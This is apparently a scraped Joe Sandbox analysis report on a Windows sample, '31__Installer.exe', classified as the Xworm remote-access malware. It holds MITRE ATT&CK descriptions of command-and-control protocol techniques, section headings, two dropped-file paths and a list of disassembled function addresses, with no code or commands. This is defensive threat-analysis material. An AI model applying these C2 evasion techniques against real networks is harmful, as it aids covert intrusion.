Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 31__Installer.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Xworm

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\Public\Downloads\ind.jpg

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Windows Analysis Report
31__Installer.exe

Function 003E11E1 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 89
filesleepmemoryCOMMON

Function 003E2E42 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 71
networkfileCOMMON

Function 003E2E3D Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64
networkfileCOMMON

Function 02F9FFE7 Relevance: 7.6, APIs: 5, Instructions: 90
memorylibraryCOMMON

Function 003E2964 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 136
COMMON

Function 02FA00CD Relevance: 6.1, APIs: 4, Instructions: 90
memoryCOMMON

Function 003E2F22 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 23
memoryCOMMON

Function 02F9FB37 Relevance: 3.2, APIs: 2, Instructions: 216
memorylibraryCOMMON

Function 003E5902 Relevance: 3.0, APIs: 2, Instructions: 32
COMMONLIBRARYCODE

Function 054675E0 Relevance: 1.6, APIs: 1, Instructions: 130
COMMON

Function 003E1830 Relevance: 1.6, APIs: 1, Instructions: 78
COMMON